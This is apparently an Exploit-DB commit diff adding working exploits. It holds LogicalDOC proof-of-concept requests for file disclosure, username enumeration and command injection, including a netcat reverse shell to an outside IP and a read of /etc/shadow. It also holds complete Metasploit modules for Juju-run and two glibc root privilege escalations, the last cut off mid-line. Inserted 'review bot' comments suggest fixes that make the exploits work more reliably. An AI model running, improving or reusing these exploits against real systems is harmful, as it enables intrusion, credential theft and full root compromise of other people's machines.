From 7b401481a204275384eea1e32e1ebaaf80ce0c6d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 13 Feb 2018 05:01:51 +0000 Subject: [PATCH] DB: 2018-02-13 7 changes to exploits/shellcodes Juju-run Agent - Privilege Escalation (Metasploit) glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit) glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit) LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure LogicalDOC Enterprise 7.7.4 - Directory Traversal LogicalDOC Enterprise 7.7.4 - User Enumeration LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution --- exploits/java/webapps/44019.txt | 111 +++++++++ exploits/java/webapps/44020.txt | 86 +++++++ exploits/java/webapps/44021.txt | 103 +++++++++ exploits/linux/local/44023.rb | 132 +++++++++++ exploits/linux/local/44024.rb | 232 +++++++++++++++++++ exploits/linux/local/44025.rb | 249 ++++++++++++++++++++ exploits/linux/remote/44022.md | 396 ++++++++++++++++++++++++++++++++ files_exploits.csv | 7 + 8 files changed, 1316 insertions(+) create mode 100644 exploits/java/webapps/44019.txt create mode 100644 exploits/java/webapps/44020.txt create mode 100644 exploits/java/webapps/44021.txt create mode 100755 exploits/linux/local/44023.rb create mode 100755 exploits/linux/local/44024.rb create mode 100755 exploits/linux/local/44025.rb create mode 100644 exploits/linux/remote/44022.md diff --git a/exploits/java/webapps/44019.txt b/exploits/java/webapps/44019.txt new file mode 100644 index 000000000..829abfe7c --- /dev/null +++ b/exploits/java/webapps/44019.txt 
@@ -0,0 +1,111 @@ +LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities + + +Vendor: LogicalDOC Srl +Product web page: https://www.logicaldoc.com +Affected version: 7.7.4 + 7.7.3 + 7.7.2 + 7.7.1 + 7.6.4 + 7.6.2 + 7.5.1 + 7.4.2 + 7.1.1 + +Summary: LogicalDOC is a free document management system that is designed +to handle and share documents within an organization. LogicalDOC is a content +repository, with Lucene indexing, Activiti workflow, and a set of automatic +import procedures. + +Desc: The application suffers from multiple post-auth file disclosure vulnerability +when input passed thru the 'suffix' and 'fileVersion' parameters is not properly +verified before being used to include files. This can be exploited to read arbitrary +files from local resources with directory traversal attacks. + +Tested on: Microsoft Windows 10 + Linux Ubuntu 16.04 + Java 1.8.0_161 + Apache-Coyote/1.1 + Apache Tomcat/8.5.24 + Apache Tomcat/8.5.13 + Undisclosed 8.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5450 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5450.php + + +26.01.2018 + +--- + + +PoC #1: + +GET /thumbnail?docId=3375114&random=1517220341243&suffix=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1 +Host: localhost:8080 + + +Response: + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 +[MCI Extensions.BAK] +3g2=MPEGVideo +3gp=MPEGVideo +3gp2=MPEGVideo +3gpp=MPEGVideo +aac=MPEGVideo +adt=MPEGVideo +adts=MPEGVideo +m2t=MPEGVideo +m2ts=MPEGVideo +m2v=MPEGVideo +m4a=MPEGVideo +m4v=MPEGVideo +mod=MPEGVideo +mov=MPEGVideo +mp4=MPEGVideo +mp4v=MPEGVideo +mts=MPEGVideo +ts=MPEGVideo +tts=MPEGVideo + + + +PoC #2: + +GET /convertpdf?docId=2450&control=preview&fileVersion=../../../../../../etc/passwd HTTP/1.1 +Host: localhozt:8080 + + +Response: + +HTTP/1.1 200 +Cache-Control: 
must-revalidate, post-check=0,pre-check=0 +Expires: 0 +Content-Disposition: attachment; filename="=?UTF-8?B?MDkyMDEyMzEwNTVTUFQgMDA0LnBkZi5wZGY=?=" +Pragma: public +Content-Type: application/pdf;charset=UTF-8 +Content-Length: 964 +Date: Mon, 05 Feb 2018 21:30:59 GMT +Connection: close + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:100:sync:/bin:/bin/sync +games:x:5:100:games:/usr/games:/bin/sh +... +... \ No newline at end of file diff --git a/exploits/java/webapps/44020.txt b/exploits/java/webapps/44020.txt new file mode 100644 index 000000000..d0e718911 --- /dev/null +++ b/exploits/java/webapps/44020.txt 
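Review bot: Neither PoC request carries a session cookie although the description classes the issue as post-auth, so a reader replaying them as-is will presumably land on the login page rather than the traversal; the advisory should state the cookie needed, e.g. `Cookie: JSESSIONID=<valid session>; ldoc-sid=<sid>` (both names appear in the 44021 advisory in this same commit). PoC #2's `Host: localhozt:8080` is a typo for `localhost`. The two payloads are also platform-specific — `..%5c` backslash traversal to `windows\win.ini` versus `../` traversal to `/etc/passwd` — which is worth saying beside each PoC, since the "Tested on" list covers both Windows and Ubuntu and a reader may otherwise assume either form works everywhere.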
@@ -0,0 +1,86 @@ +LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness + + +Vendor: LogicalDOC Srl +Product web page: https://www.logicaldoc.com +Affected version: 7.7.4 + 7.7.3 + 7.7.2 + 7.7.1 + 7.6.4 + 7.6.2 + 7.5.1 + 7.4.2 + 7.1.1 + +Summary: LogicalDOC is a free document management system that is designed +to handle and share documents within an organization. LogicalDOC is a content +repository, with Lucene indexing, Activiti workflow, and a set of automatic +import procedures. + +Desc: The weakness is caused due to the 'j_spring_security_check' script +and how it verifies provided credentials. Attacker can use this weakness +to enumerate valid users on the affected node. + +Tested on: Microsoft Windows 10 + Linux Ubuntu 16.04 + Java 1.8.0_161 + Apache-Coyote/1.1 + Apache Tomcat/8.5.24 + Apache Tomcat/8.5.13 + Undisclosed 8.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5451 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php + + +26.01.2018 + +-- + + +Request/response for existent username: +--------------------------------------- + +POST /j_spring_security_check HTTP/1.1 +Host: 192.168.1.74:8080 + +j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp + +-- + +HTTP/1.1 302 +Set-Cookie: ldoc-failure=wrongpassword +Location: //login.jsp?failure=wrongpassword +Content-Length: 0 +Date: Tue, 06 Feb 2084 19:42:15 GMT +Connection: close + + +Request/response for non-existent username: +------------------------------------------- + +POST /j_spring_security_check HTTP/1.1 +Host: 192.168.1.74:8080 + +j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp + +-- + +HTTP/1.1 500 +Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly +Content-Type: text/html;charset=UTF-8 +Content-Length: 78 +Date: Tue, 06 Feb 2084 19:57:14 GMT +Connection: close + + + +


ERROR
+ + \ No newline at end of file diff --git a/exploits/java/webapps/44021.txt b/exploits/java/webapps/44021.txt new file mode 100644 index 000000000..48cc2cb04 --- /dev/null +++ b/exploits/java/webapps/44021.txt 
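Review bot: The advisory never names the oracle, although the captures show it plainly: a known user gets `HTTP/1.1 302` with `Set-Cookie: ldoc-failure=wrongpassword`, an unknown one gets `HTTP/1.1 500` with an error page, so a sentence such as `Oracle: 302 + ldoc-failure cookie = username exists; 500 = username does not exist` after the second response would let tooling automate it. The 500 indicates that the unknown-user path ends in an unhandled exception rather than the generic failure redirect, which is the behaviour a fix has to equalise (same status, cookie and body for both cases). The `Date: Tue, 06 Feb 2084` headers in both captures are evidently edited and should not be read as timing data. The `Location: //login.jsp?failure=wrongpassword` appears to echo the client-supplied `j_failureurl`, which is a separate redirect check worth doing but is not demonstrated here.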
@@ -0,0 +1,103 @@ +LogicalDOC Enterprise 7.7.4 Post-Auth Command Execution Via Binary Path Manipulation + + +Vendor: LogicalDOC Srl +Product web page: https://www.logicaldoc.com +Affected version: 7.7.4 + 7.7.3 + 7.7.2 + 7.7.1 + 7.6.4 + 7.6.2 + 7.5.1 + 7.4.2 + 7.1.1 + +Summary: LogicalDOC is a free document management system that is designed +to handle and share documents within an organization. LogicalDOC is a content +repository, with Lucene indexing, Activiti workflow, and a set of automatic +import procedures. + +Desc: LogicalDOC suffers from multiple authenticated OS command execution +vulnerabilities by manipulating the path of the many binaries included in the +package when changing the settings with their respected arguments. This can be +exploited to execute local root privilege escalation attack and/or inject and +execute arbitrary system commands as the root or SYSTEM user depending on the +platform affected. + +Tested on: Microsoft Windows 10 + Linux Ubuntu 16.04 + Java 1.8.0_161 + Apache-Coyote/1.1 + Apache Tomcat/8.5.24 + Apache Tomcat/8.5.13 + Undisclosed 8.41 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5452 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5452.php + + +26.01.2018 + + + + +After saving the settings, the command will be executed whenever a user uploads a file +that was inserted in the 'default.antivirus.includes' list. 
PoC for antivirus.command: +-------------------------------------------------------------------------------------- + +POST /frontend/setting HTTP/1.1 +Host: localhost:8080 +Connection: keep-alive +Content-Length: 594 +X-GWT-Module-Base: http://localhost:8080/frontend/ +X-GWT-Permutation: 87C7268A2BDB185A47D161B6D6D2DEE8 +Origin: http://localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67 +Content-Type: text/x-gwt-rpc; charset=UTF-8 +Accept: */* +Referer: http://localhost:8080/frontend.jsp?docId=3735554 +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Cookie: GLog=%7B%0A%20%20%20%20trackRPC%3Afalse%0A%7D; JSESSIONID=FCFD7719139A634C8411FD081780BE2A; ldoc-sid=5dd1ea28-36a0-4967-bdd8-2556d16101d7 + + +7|0|16|http://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.antivirus.enabled|true|default.antivirus.excludes|*.tif,*.tiff,*.jpg,*.jpeg,*.png,*.bmp,*.gif,*.txt,*.iso|default.antivirus.includes|*.exe,*.com,*.pif,*.scr,*.dll,*.tar.gz|default.antivirus.timeout|0|antivirus.command|c:\\windows\\system32\\calc.exe|1|2|3|4|1|5|5|5|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16| + + + +PoC for call home reverse shell via ocr.Tesseract.path: +------------------------------------------------------- + +POST /frontend/setting HTTP/1.1 +Host: localhost:8080 + + 
+7|0|25|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|default.ocr.includes|*.pdf,*.tif,*.png,*.jpg,*.txt|default.ocr.excludes|*.odt|default.ocr.text.threshold|1|default.ocr.resolution.threshold|400|ocr.timeout|90|ocr.rendres|180|ocr.rendres.barcode|ocr.batch|2|ocr.engine|Tesseract|ocr.Tesseract.path|nc -c /bin/sh 10.0.0.17 4444|1|2|3|4|1|5|5|10|6|0|7|8|6|0|9|10|6|0|11|12|6|0|13|14|6|0|15|16|6|0|17|18|6|0|19|18|6|0|20|21|6|0|22|23|6|0|24|25| + + + +PoC for Key Store via OpenSSL path: +----------------------------------- + +POST /frontend/sign HTTP/1.1 +Host: localhost:8080 + + +7|0|14|https://localhost:8080/frontend/|16A5065211C47142C5282B2BC4600F1D|com.logicaldoc.gui.frontend.client.services.SignService|generateNewKeystore|com.logicaldoc.gui.common.client.beans.GUIKeystore/3815185030|java.util.Date/3385151746|1337|/usr/bin/openssl && /usr/bin/cat /etc/shadow|root|O=ZSL,OU=JXY,C=MK|123|#000000|$PAGE_WIDTH/6|5|1|2|3|4|1|5|5|6|WFn2zQZ|A|7|8|9|10|0|11|12|60|100|0|13|14|14|B|2| + + + +PoC for clients and external apps and services path via command.convert, command.gs, command.openssl, command.pdftohtml, command.keytool: +----------------------------------------------------------------------------------------------------------------------------------------- + +POST /frontend/setting HTTP/1.1 +Host: localhost:8080 + + +7|0|35|https://localhost:8080/frontend/|2B4A04609097A6274DA6D61C469E4E6B|com.logicaldoc.gui.frontend.client.services.SettingService|saveSettings|[Lcom.logicaldoc.gui.common.client.beans.GUIParameter;/1603922774|com.logicaldoc.gui.common.client.beans.GUIParameter/3041767606|webservice.enabled|true|webdav.enabled|webdav.usecache|false|command.convert|/usr/bin/whoami > 
test.txt|command.gs|/usr/bin/gs|command.openssl|/usr/bin/openssl|command.pdftohtml|/usr/bin/pdftohtml|command.keytool|1337|cmis.enabled|cmis.changelog|cmis.maxitems|200|default.extcall.enabled|default.extcall.name|External Call|default.extcall.baseurl||default.extcall.suffix|default.extcall.window|_blank|default.extcall.params|user|1|2|3|4|1|5|5|17|6|0|7|8|6|0|9|8|6|0|10|11|6|0|12|13|6|0|14|15|6|0|16|17|6|0|18|19|6|0|20|21|6|0|22|8|6|0|23|8|6|0|24|25|6|0|26|11|6|0|27|28|6|0|29|30|6|0|31|30|6|0|32|33|6|0|34|35| \ No newline at end of file diff --git a/exploits/linux/local/44023.rb b/exploits/linux/local/44023.rb new file mode 100755 index 000000000..ecb7cd0bb --- /dev/null +++ b/exploits/linux/local/44023.rb 
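Review bot: The GWT-RPC bodies embed a per-build serialization-policy strong name (`2B4A04609097A6274DA6D61C469E4E6B` for SettingService, `16A5065211C47142C5282B2BC4600F1D` for SignService) and the first request an `X-GWT-Permutation` header; these are generated when the frontend is compiled, so the advisory should note that they, together with the `JSESSIONID`/`ldoc-sid` cookies, must be captured from the target installation before replay or the server will reject the call. The claim of root/SYSTEM execution depends on the account the LogicalDOC service runs under, which nothing here establishes; it reads more accurately as "the service account (root/SYSTEM in the tested installs)". The sentence `After saving the settings, the command will be executed whenever a user uploads a file that was inserted in the 'default.antivirus.includes' list.` appears before the heading `PoC for antivirus.command:` it describes and belongs after that request. The reverse-shell PoC `nc -c /bin/sh 10.0.0.17 4444` assumes a netcat build that supports `-c` (e.g. Ncat), which is worth stating.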
@@ -0,0 +1,132 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Juju-run Agent Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Juju agent systems + running the juju-run agent utility. + + Juju agent systems running agent tools prior to version 1.25.12, + 2.0.x before 2.0.4, and 2.1.x before 2.1.3, provide a UNIX domain socket + to manage software ("units") without setting appropriate permissions, + allowing unprivileged local users to execute arbitrary commands as root. + + This module has been tested successfully with Juju agent tools versions + 1.18.4, 1.25.5 and 1.25.9 on Ubuntu 14.04.1 LTS x86 deployed by Juju + 1.18.1-trusty-amd64 and 1.25.6-trusty-amd64 on Ubuntu 14.04.1 LTS x86_64. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ryan Beisner', # Discovery and PoC + 'David Ames (@thedac)', # Discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'DisclosureDate' => 'Apr 13 2017', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'References' => + [ + [ 'CVE', '2017-9232' ], + [ 'BID', '98737' ], + [ 'URL', 'https://bugs.launchpad.net/juju/+bug/1682411' ] + ] + )) + register_options( + [ + OptString.new('UNIT', [ false, 'A valid Juju unit name', '' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def check + juju_run_path = cmd_exec 'which juju-run' + + if juju_run_path.start_with? 
'/' + vprint_good 'juju-run is installed' + return CheckCode::Detected + end + + vprint_error 'juju-run is NOT installed' + + CheckCode::Safe + end + + def unit_names + units = [] + + cmd_exec('/bin/ls -m /var/log/juju/*.log').chomp.split(/,\s*/).each do |log| + units << ::File.basename(log).gsub(/\.log$/, '') + end + + cmd_exec('/bin/ls -m /var/lib/juju/agents/').chomp.split(/,\s*/).each do |agent| + units << ::File.basename(agent) + end + + units.uniq + end + + def execute_command(cmd, opts = {}) + cmd_exec "juju-run #{opts['unit']} '#{cmd}'" + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def exploit + if check != CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + units = datastore['UNIT'].blank? ? unit_names : [ datastore['UNIT'] ] + + if units.empty? + fail_with Failure::Unknown, "Could not find any Juju units. Try specifying a 'UNIT'" + end + + # Check each unit for a privileged socket + print_status "Trying #{units.size} units..." + + socket_unit = nil + unit_names.each do |unit| + id = execute_command 'id', 'unit' => unit + + if id.include? 'root' + print_good "Unit #{unit.inspect} uses a privileged socket" + socket_unit = unit + break + end + end + + if socket_unit.nil? + fail_with Failure::NotVulnerable, 'Could not find any Juju units using a privileged socket' + end + + # Upload payload executable + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{datastore['WritableDir']}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + # Execute payload executable + vprint_status 'Executing payload...' + execute_command payload_path, 'unit' => socket_unit + end +end \ No newline at end of file 
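Review bot: The `UNIT` option is silently ignored in `exploit`: `units` is built from `datastore['UNIT']` and checked for emptiness, but the probe loop that follows iterates `unit_names.each do |unit|`, so every discovered unit is tried even when the operator pinned one, and a `UNIT` that is not present under `/var/log/juju` or `/var/lib/juju/agents` is never tried at all. The loop should read `units.each do |unit|`. Separately, `execute_command` interpolates the unit name unquoted into `juju-run #{opts['unit']} '#{cmd}'`; the names come from `ls` output or the option so it is not a practical injection, but quoting the unit would make that explicit.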
diff --git a/exploits/linux/local/44024.rb b/exploits/linux/local/44024.rb new file mode 100755 index 000000000..84e430ad2 --- /dev/null +++ b/exploits/linux/local/44024.rb 
@@ -0,0 +1,232 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/exe' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Local::Linux + + def initialize(info = {}) + super(update_info(info, + 'Name' => "glibc '$ORIGIN' Expansion Privilege Escalation", + 'Description' => %q{ + This module attempts to gain root privileges on Linux systems by abusing + a vulnerability in the GNU C Library (glibc) dynamic linker. + + glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not + properly restrict use of the LD_AUDIT environment variable when loading + setuid executables which allows control over the $ORIGIN library search + path resulting in execution of arbitrary shared objects. + + This module opens a file descriptor to the specified suid executable via + a hard link, then replaces the hard link with a shared object before + instructing the linker to execute the file descriptor, resulting in + arbitrary code execution. + + The specified setuid binary must be readable and located on the same + file system partition as the specified writable directory. + + This module has been tested successfully on glibc version 2.5 on CentOS + 5.4 (x86_64), 2.5 on CentOS 5.5 (x86_64) and 2.12 on Fedora 13 (i386). + + RHEL 5 is reportedly affected, but untested. Some versions of ld.so, + such as the version shipped with Ubuntu 14, hit a failed assertion + in dl_open_worker causing exploitation to fail. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # Discovery and exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Oct 18 2010', + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'Linux x86', { 'Arch' => ARCH_X86 } ], + [ 'Linux x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'CVE', '2010-3847' ], + [ 'BID', '44154' ], + [ 'EDB', '15274' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ], + [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ], + [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ], + [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ] + ] + )) + register_options( + [ + OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def suid_exe_path + datastore['SUID_EXECUTABLE'] + end + + def check + glibc_banner = cmd_exec 'ldd --version' + glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first + if glibc_version.eql? '' + vprint_error 'Could not determine the GNU C library version' + return CheckCode::Safe + elsif glibc_version >= Gem::Version.new('2.12.2') || + (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12')) + vprint_error "GNU C Library version #{glibc_version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "GNU C Library version #{glibc_version} is vulnerable" + + unless setuid? suid_exe_path + vprint_error "#{suid_exe_path} is not setuid" + return CheckCode::Detected + end + vprint_good "#{suid_exe_path} is setuid" + + unless cmd_exec("test -r #{suid_exe_path} && echo true").include? 
'true' + vprint_error("#{suid_exe_path} is not readable") + return CheckCode::Detected + end + vprint_good "#{suid_exe_path} is readable" + + CheckCode::Appears + end + + def upload_and_chmodx(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + cmd_exec "chmod +x '#{path}'" + register_file_for_cleanup path + end + + def exploit + check_status = check + + if check_status == CheckCode::Appears + print_good 'The target appears to be vulnerable' + elsif check_status == CheckCode::Detected + fail_with Failure::BadConfig, "#{suid_exe_path} is not suid or not readable" + else + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'" + base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'" + if suid_partition == base_partition + vprint_good "'#{suid_exe_path}' and '#{base_dir}' are located on the same partition" + else + print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition" + end + + payload_name = ".#{rand_text_alphanumeric rand(5..10)}" + payload_path = "#{base_dir}/#{payload_name}" + + # Set target + uname = cmd_exec 'uname -m' + vprint_status "System architecture is #{uname}" + if target.name.eql? 
'Automatic' + case uname + when 'x86_64' + my_target = targets[2] + when /x86/, /i\d86/ + my_target = targets[1] + else + fail_with Failure::NoTarget, 'Unable to automatically select a target' + end + else + my_target = target + end + print_status "Using target: #{my_target.name}" + + cpu = nil + case my_target['Arch'] + when ARCH_X86 + cpu = Metasm::Ia32.new + when ARCH_X64 + cpu = Metasm::X86_64.new + else + fail_with Failure::NoTarget, 'Target is not compatible' + end + + # Compile shared object + so_stub = %| + extern int setuid(int); + extern int setgid(int); + extern int system(const char *__s); + + void init(void) __attribute__((constructor)); + + void __attribute__((constructor)) init() { + setuid(0); + setgid(0); + system("#{payload_path}"); + } + | + + begin + so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib) + rescue + print_error "Metasm encoding failed: #{$ERROR_INFO}" + elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}" + elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}" + fail_with Failure::Unknown, 'Metasm encoding failed' + end + + # Upload shared object + so_name = ".#{rand_text_alphanumeric rand(5..10)}" + so_path = "#{base_dir}/#{so_name}" + upload_and_chmodx so_path, so + + # Upload exploit + link_name = ".#{rand_text_alphanumeric rand(5..10)}" + link_path = "#{base_dir}/#{link_name}" + fd = rand(10..200) + exp = %( + rm -rf '#{link_path}' + mkdir '#{link_path}' + ln #{suid_exe_path} #{link_path}/#{link_name} + exec #{fd}< #{link_path}/#{link_name} + ls -l /proc/$$/fd/#{fd} + rm -rf '#{link_path}' + ls -l /proc/$$/fd/#{fd} + mv #{so_path} #{link_path} + LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd} + ) + + exp_name = ".#{rand_text_alphanumeric rand(5..10)}" + exp_path = "#{base_dir}/#{exp_name}" + upload_and_chmodx exp_path, exp + register_file_for_cleanup link_path + + # Upload payload + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' 
+ # The echo at the end of the command is required + # else the original session may die + output = cmd_exec "#{exp_path}& echo " + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/local/44025.rb b/exploits/linux/local/44025.rb new file mode 100755 index 000000000..79ecef50a --- /dev/null +++ b/exploits/linux/local/44025.rb 
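Review bot: The empty-banner guard in `check` can never fire: `glibc_version` is a `Gem::Version`, so `glibc_version.eql? ''` compares an object to a String and is always false, and a `ldd --version` banner that does not match the regex passes `nil` to `Gem::Version.new` (which raises or yields `0` depending on the RubyGems version) instead of returning `CheckCode::Safe`. The sibling module 44025.rb in this same commit uses `glibc_version.to_s.eql? ''`, and this one should match it. The partition comparison is only a `print_warning` although the description says the suid binary must be on the same filesystem as `WritableDir`; since `ln` cannot hard-link across filesystems the uploaded script will fail at `ln #{suid_exe_path} ...`, so `fail_with Failure::BadConfig, 'SUID_EXECUTABLE and WritableDir must be on the same filesystem'` would be clearer than running on.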
@@ -0,0 +1,249 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/local/linux' +require 'msf/core/exploit/exe' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Exploit::Local::Linux + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Linux systems by abusing + a vulnerability in the GNU C Library (glibc) dynamic linker. + + glibc ld.so in versions before 2.11.3, and 2.12.x before 2.12.2 does not + properly restrict use of the LD_AUDIT environment variable when loading + setuid executables. This allows loading arbitrary shared objects from + the trusted library search path with the privileges of the suid user. + + This module uses LD_AUDIT to load the libpcprofile.so shared object, + distributed with some versions of glibc, and leverages arbitrary file + creation functionality in the library constructor to write a root-owned + world-writable file to a system trusted search path (usually /lib). + The file is then overwritten with a shared object then loaded with + LD_AUDIT resulting in arbitrary code execution. + + This module has been tested successfully on glibc version 2.11.1 on + Ubuntu 10.04 x86_64 and version 2.7 on Debian 5.0.4 i386. + + RHEL 5 is reportedly affected, but untested. Some glibc distributions + do not contain the libpcprofile.so library required for successful + exploitation. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Tavis Ormandy', # Discovery and exploit + 'zx2c4', # "I Can't Read and I Won't Race You Either" exploit + 'Marco Ivaldi', # raptor_ldaudit and raptor_ldaudit2 exploits + 'Todor Donev', # libmemusage.so exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Oct 18 2010', + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => + [ + [ 'Automatic', { } ], + [ 'Linux x86', { 'Arch' => ARCH_X86 } ], + [ 'Linux x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'CVE', '2010-3847' ], + [ 'CVE', '2010-3856' ], + [ 'BID', '44154' ], + [ 'BID', '44347' ], + [ 'EDB', '15274' ], + [ 'EDB', '15304' ], + [ 'EDB', '18105' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/257' ], + [ 'URL', 'http://seclists.org/fulldisclosure/2010/Oct/344' ], + [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ], + [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ], + [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3856' ], + [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ], + [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3856' ] + ] + )) + register_options( + [ + OptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/bin/ping' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def base_dir + datastore['WritableDir'] + end + + def suid_exe_path + datastore['SUID_EXECUTABLE'] + end + + def check + glibc_banner = cmd_exec 'ldd --version' + glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first + if glibc_version.to_s.eql? 
